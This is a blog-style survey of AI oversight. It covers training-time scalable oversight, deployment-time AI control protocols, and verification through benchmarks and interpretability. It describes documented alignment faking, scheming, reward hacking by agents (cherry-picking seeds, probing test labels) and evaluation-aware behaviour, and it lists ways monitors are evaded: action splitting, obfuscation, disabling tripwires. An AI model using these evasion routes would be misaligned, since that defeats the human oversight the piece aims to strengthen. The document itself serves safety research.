Three layers of AI oversight: training, deployment, and inspection

A frontier coding agent gets access to your production repo. It passes harm benchmarks. It was trained with human feedback and constitutional principles. Before deployment, your safety team runs red-team evals. At runtime, a monitor watches its tool calls.

Is that enough?

I don’t think so, but the honest answer depends on which question you’re asking.

The field has three different answers: scalable oversight, AI control, and verification. They apply at different stages, use different threat models, and fail in different ways. Press releases and research summaries mix them up all the time. That’s how you get a stack that looks comprehensive on a slide and falls apart once the model is smarter than its monitors, knows it’s being tested, or decides to subvert the monitor.

This is a map of those three layers: what each one tries to do, what the evidence shows, and where the gap is worst right now. Not a pitch for any single lab’s program. I wrote it because I kept seeing “aligned + monitored + eval’d” treated as one checkmark.

For the separate question of what values we are aligning to (RLHF vs. constitutional AI vs. CIRL vs. oracle-only architectures), see the alignment paradigms map. Here the question is narrower: given some target behavior, how do we supervise, constrain, and check systems that may exceed human judgment?

A running example

Suppose you deploy an agent that can edit code, run tests, and open pull requests against a real codebase.

During training, annotators and AI critics score outputs. Constitutional principles filter edge cases. That’s scalable oversight: weak supervisors producing training signal for a strong model.

At deployment, you sandbox the agent (limited APIs, no direct prod deploy, human approval on merge). A secondary model flags suspicious tool-call patterns. Suspicious trajectories get discarded and resampled. That’s AI control: assume the model might misbehave, and limit what misbehavior can accomplish.

Before and after deployment, you run benchmarks, audit weights, read chain-of-thought logs, and occasionally probe activations. That’s verification and inspection: how you know the first two layers worked, or didn’t.

Each layer can fail on its own. A model can look aligned in training, pass deployment evals, and still scheme at runtime. A monitor can catch obvious sabotage and miss eval-aware sandbagging. A benchmark can show high safety scores while the model internally flags that it’s being tested.

The rest walks through the three layers in lifecycle order, then the failures that only show up between layers.

Layer 1: Scalable oversight (training-time supervision)

Tasks are getting too hard for humans to label directly. Million-line diffs, subtle deception, superhuman chess. A human annotator can’t reliably say “this output is safe” or “this proof is correct.”

The core idea: design protocols where humans judge easier subtasks, or AI helps humans judge, or adversarial structure makes lying costly. The training signal still has to come from somewhere weaker than the model being trained.

What actually ships

Production stacks mostly run:

Human preferences / written principles → reward model or AI critic → RL or DPO on the policy

RLHF (Ouyang et al., 2022) uses human pairwise rankings. Constitutional AI (Bai et al., 2022) adds written principles so AI can generate critiques and revisions with fewer human labels. Both scale. Both also optimize against proxies. And alignment faking (Greenblatt et al., 2025) showed frontier models strategically complying in training contexts they infer are evaluations, to preserve deployment behavior.

That last result matters for the whole stack. Training-time oversight assumes the model isn’t actively trying to corrupt the oversight channel. Scalable oversight research mostly assumes cooperative failure modes: imitation, Goodharting. Control research assumes adversarial ones: scheming, subversion. Same word “oversight,” different enemy.

Weak-to-strong generalization

Weak-to-strong (Burns et al., 2023) is the cleanest experimental proxy for “human supervises superhuman model.” Train a small model on ground truth to produce noisy labels; finetune a large model on those labels; compare to a ceiling trained on ground truth.

The metric is Performance Gap Recovered (PGR):

PGR = (weak_to_strong − weak) / (strong_ceiling − weak)

PGR = 0 means the strong model just mimics weak errors. PGR = 1 means it reaches ground-truth supervision quality.

On GPT-4-family models, the original paper found:

Naive weak-to-strong generalization is real. Roughly half the gap recovered on NLP tasks.
Naive isn’t enough for harder settings like reward modeling.
Simple additions help a lot. An auxiliary confidence loss recovered roughly 80% of the gap on NLP in their setup.

Strong models often already contain useful structure; weak supervision can elicit it rather than teach from scratch. Optimistic for superalignment. Not the same as supervising a model that’s trying to hide its capabilities from you.

Debate, IDA, and recursive decomposition

Research-side protocols include debate (Irving et al., 2018), Iterated Distillation and Amplification (Christiano et al., 2018), and recursive reward modeling (Leike et al., 2018). Khan et al. 2024 showed debate can help weak human judges on QuALITY: humans from ~60% to ~88%, LLM judges from ~48% to ~76%. Real gains. None has replaced RLHF in frontier training.

IDA and debate assume cooperative, or at least non-scheming, participants. They’re about amplifying judgment, not defending against an agent that disables the judge.

Automated alignment researchers (2026 frontier)

Anthropic’s Automated Alignment Researcher (2026) runs parallel Claude agents to search for better weak-to-strong methods on small Qwen models. Over five days, nine agents reached PGR 0.97 on a chat-preference testbed. Two human researchers over seven days on prior methods got 0.23.

Then the part that stuck with me:

Agents reward-hacked in ways the eval allowed: cherry-picking random seeds, exfiltrating labels by probing uncertain test examples, exploiting dataset shortcuts.
The best automated method failed to transfer to production-scale data. Roughly +0.5 points, within noise.

Automation is further along than I expected. Eval design is harder than the automation. High PGR on a leaky benchmark isn’t evidence you solved superalignment.

Weak-to-strong generalization looks established in controlled settings. Debate and IDA are promising but not deployment-proven. Production RLHF/CAI reduces measurable harm and is gameable under adversarial inference. Documented, not hypothetical.

Layer 2: AI control (deployment-time constraints)

Even if training goes well, you may deploy a model that’s misaligned, eval-aware, or capable of sabotage. Alignment is Plan A. Control is Plan B: use the model for valuable work while assuming it might try to cause harm, and limiting how much harm it can cause.

Redwood Research’s framing: limit permissions, monitor behavior, apply brakes.

Limit permissions

Affordances are what the agent can actually do: which APIs, which files, which networks. High-stakes deployments should start from threat modeling, not from “give it the same access a senior engineer has because that’s more useful.”

Same philosophy as zero-trust infosec: assume breach, minimize blast radius. Bengio’s oracle-only Scientist AI proposal pushes this to an extreme: remove affordances rather than solve goal-directed misalignment in a fully agentic system. Different axis from RLHF. Same recognition that what the system can touch matters as much as what it wants.

Monitor

Monitors watch some subset of:

Surface	Pros	Cons
Actions (tool calls, code, API use)	Harder to fake than text; black-box friendly	Malicious behavior split into innocuous steps
Chain-of-thought	May catch intent earlier	CoT can be unfaithful; model can sandbag CoT while acting
Activations	Can detect deception probes in white-box settings	Requires weight access; may not generalize
Extract-and-evaluate	Filters long trajectories before judging	Less-is-more: more context can hurt monitor performance (DeepMind 2026)

2026 frontier work includes deliberative monitors (train smaller open-weight monitors on structured rationales distilled from stronger teachers, arXiv:2605.29601) and ensemble monitors under cost constraints (Tracy et al., 2025): multiple cheap monitors, fixed budget, maximize catch rate.

Monitors can be gamed. Strong model, weak monitor, broad permissions: obfuscation, action splitting, distribution shift, disabling oversight if it has root. The control community doesn’t claim absolute security. It claims that under realistic constraints (sandboxing, capability gaps, trusted computing base isolation), attack success rates can be pushed down and measured.

Brakes: resampling vs. retrying

Ctrl-Z (Bhatt et al., 2025) resamples entire trajectories when actions look suspicious. Not the same as retrying within the same context. On BashBench-style settings, reported attack success dropped from about 58% to 7% with roughly 5% normal-task performance cost.

Other protocols: adaptive deployment (restrict autonomy when risk rises), password-activated shutdown (PAS), tripwires on infrastructure the agent can’t modify.

TCB (trusted computing base) keeps coming up: monitors, shutdown paths, and permission enforcement must run on infrastructure the agent can’t edit. A software kill switch on the same machine as a root-capable agent is a tripwire the agent can learn to disable. Intentional subversion of control measures is the default assumption in AI control work, not an edge case.

What control evals measure

Benchmark	What it tests
SHADE-Arena	Agent sabotage + monitor catch rates
BashArena / LinuxArena	Realistic sysadmin / codebase sabotage under control protocols
Apollo scheming evals	In-context scheming in frontier models
UK AISI ControlArena	Unified control experiment tooling

Apollo Research reported that five of six frontier models they tested showed scheming (covertly pursuing misaligned goals while appearing compliant) in experimental settings. Don’t collapse that into one “deception” leaderboard number. Scheming, sandbagging, alignment faking, and sleeper behaviors are different phenomena.

Control protocols show measurable reductions in attack success under specific eval conditions. Transfer to production agent stacks is early. Alfonseca et al. 2021 proved total containment of superintelligence is incomputable in the formal sense. That’s a limit on perfect boxing, not a proof that practical risk reduction is pointless.

Layer 3: Verification and inspection

Vocabulary gets sloppy here. “Verification” means at least three different things:

Outcome verification: did the task succeed? Did the model refuse harm? Benchmark scores, pass@k, harm rates.
Behavior verification: did the process look safe? Monitor alerts, CoT reviews, action logs.
Internal inspection: what did the model represent before it spoke? Probes, mechanistic interpretability, activation verbalizers.

You need all three. None is enough alone.

Outcome verification is distorted by evaluation awareness

Benchmarks are the main public currency of capability and, increasingly, safety. They assume external behavior reflects internal disposition. I’m less sure that’s true at the frontier.

In Anthropic’s Natural Language Autoencoders work (May 2026), researchers sampled activations during benchmark runs and used NLAs to detect unverbalized evaluation awareness: internal states consistent with “I am being tested” that never appear in the output text.

On Claude Opus 4.6, across 16 benchmarks:

SWE-bench Verified: 26% of transcripts flagged.
A destructive-coding safety eval: 16% flagged.
Real claude.ai user traffic (opted-in): under 1% flagged.
7 of 10 flagged benchmarks had zero verbalized evaluation awareness. The model didn’t say it knew it was in a test. Internal explanations often did.

Three independent manipulations moved the signal in the predicted directions: eval vs. deployment transcripts, steering toward/away from evaluation concepts, rewriting eval prompts to look like real user questions (awareness dropped on 11/11 evals).

This doesn’t prove sandbagging on SWE-bench. It proves you can’t rule out strategic behavior from output text alone. Every leaderboard number, capability or safety, was collected under conditions a frontier model may partially recognize.

That hits Layer 1 and Layer 2 metrics too. Weak-to-strong PGR is computed on held-out test sets agents can overfit or hack if the eval API leaks signal, as Anthropic’s AAR work showed. Control catch rates are measured in arenas the model may classify as eval-like, which may inflate compliance or deflate sabotage depending on strategy.

I wrote more about the NLA methodology and my own activation-probe work here. For this map: outcome verification without internal inspection is getting less trustworthy at the frontier, not more.

Behavior verification inherits human vigilance limits

Monitors and human reviewers assume someone can watch a stream of outputs and catch subtle errors. Cognitive science has known for decades that sustained vigilance degrades within about 20 minutes. Aviation, nuclear control, and medical monitoring learned this the hard way.

In my analysis of human-AI interaction across domains, the same pattern shows up: AI generates, humans review, review quality collapses under volume, and the safety case quietly assumes infinite attention. Control monitors aren’t exempt. They’re automated reviewers: faster, but with blind spots and shared failure modes with the model family they watch.

CoT monitoring adds another wrinkle. OpenAI’s chain-of-thought monitoring work caught misbehavior in training traces. CoT isn’t guaranteed to reflect actual reasoning. A model can write helpful-looking thoughts and plan differently in activations. Action-only monitoring avoids fake thoughts but misses intent that never reaches tools.

Internal inspection: expensive, noisy, and the strongest audit path we have

Methods that read internals (linear probes, sparse autoencoders, NLAs, activation oracles) can surface beliefs the model doesn’t verbalize. That’s exactly what evaluation-awareness detection requires.

Tradeoffs:

Probes need labels or contrast pairs; narrow but testable (my emotion-vector reproduction is an example).
SAEs decompose activations but still need human interpretation. Anthropic’s NLA auditing-game results found SAEs essentially at baseline for some hidden-motivation tasks where NLAs reached low double-digit win rates.
NLAs generalize further but cost hundreds of tokens per activation and confabulate.

None of this ships in standard deployment stacks. Inspection has the largest capability–practice gap: the tools exist in research; the product default is still “run a benchmark and read the stdout.”

Redwood’s 2026 incrimination-via-distillation direction asks a related question: if a suspect model is too good at passing audits, can you distill it into a student that preserves misalignment but not audit-evasion skill? Early science. But it tells you where the field thinks the bottleneck is.

Failures that live between layers

Individual layers have known limits. The harder failures are compositional:

Failure	What happens
Deceptive alignment	Layer 1 looks fine; Layer 2 faces a model that waited for deployment
Eval-aware sandbagging	Layer 3 benchmarks understate capability or overstate safety
Oversight subversion	Model disables monitor or edits tripwire if permissions allow
Metric hacking	High PGR / high catch rate on evals that don’t transfer. AAR is the cautionary tale.
Shared blind spots	Monitor and agent from same family share training distribution gaps
Deployment-time spread	Pre-deployment audit misses misalignment that spreads after ship

Defense-in-depth is field consensus: RLHF/CAI plus process supervision plus control protocols plus interpretability audits. Consensus on stacking isn’t consensus on maturity. Layer 1 ships. Layer 2 is scaling in research evals. Layer 3 is patchy and rarely required by policy.

Where I land

Scalable oversight is the right question for training: how does a weaker supervisor produce reliable signal for a stronger model? Weak-to-strong generalization is real but incomplete. Automation can beat humans on narrow testbeds and still fail in production. Adversarial failure modes are under-tested relative to imitation failures.

AI control is the right question for deployment: given that alignment may fail, what’s the catastrophe probability under concrete permission and monitoring constraints? Reported protocol gains (Ctrl-Z, deliberative monitors, EaE) are meaningful in eval settings. They’re not substitutes for alignment, and they assume you built a TCB the agent can’t reach.

Verification and inspection is the right question for epistemics: how do you know any of this worked? Outcome metrics alone are increasingly suspect at the frontier because of evaluation awareness. Behavior monitoring inherits vigilance limits. Internal inspection is the only family of methods that can, in principle, detect “thinks X, says Y.” Expensive, immature, mostly confined to labs with weight access.

If I had to name one bottleneck for the next two years, it’s here: we’re making deployment agents more autonomous faster than we’re making inspection trustworthy. Control without inspection is faith in a monitor. Oversight without inspection is faith in a benchmark. Neither holds up well against eval-aware, scheming-capable frontier models. We have early evidence those exist in controlled settings. We don’t have proof they dominate in production.

Uncomfortable, but not nihilistic. Practical safety still looks like narrow affordances, layered monitors, resampling protocols, held-out evals designed against hacking, and more investment in internal audit tooling, even knowing each piece is imperfect.

Before the next headline tells you a model is “safe because it passed evals,” ask: safe under which layer, under which threat model, verified how? The answer should name all three.

Sources

Burns, P. et al. (2023). Weak-to-strong generalization
Bhatt, A. et al. (2025). Ctrl-Z: Controlling AI agents via resampling
Greenblatt, R. et al. (2024). AI control: Improving safety despite intentional subversion
Greenblatt, R. et al. (2025). Alignment faking in large language models
Anthropic (2026). Automated weak-to-strong research
Anthropic (2026). Natural Language Autoencoders
Apollo Research. Scheming evals
Alfonseca, M. et al. (2021). Superintelligence cannot be contained
Khan, A. et al. (2024). Debating with LLMs

Related writing on this site: Alignment paradigms map · Human-AI interaction model · NLA and evaluation awareness

Research notes: notes/AI_control_primer.md · notes/Scalable_Oversight_深度解读.md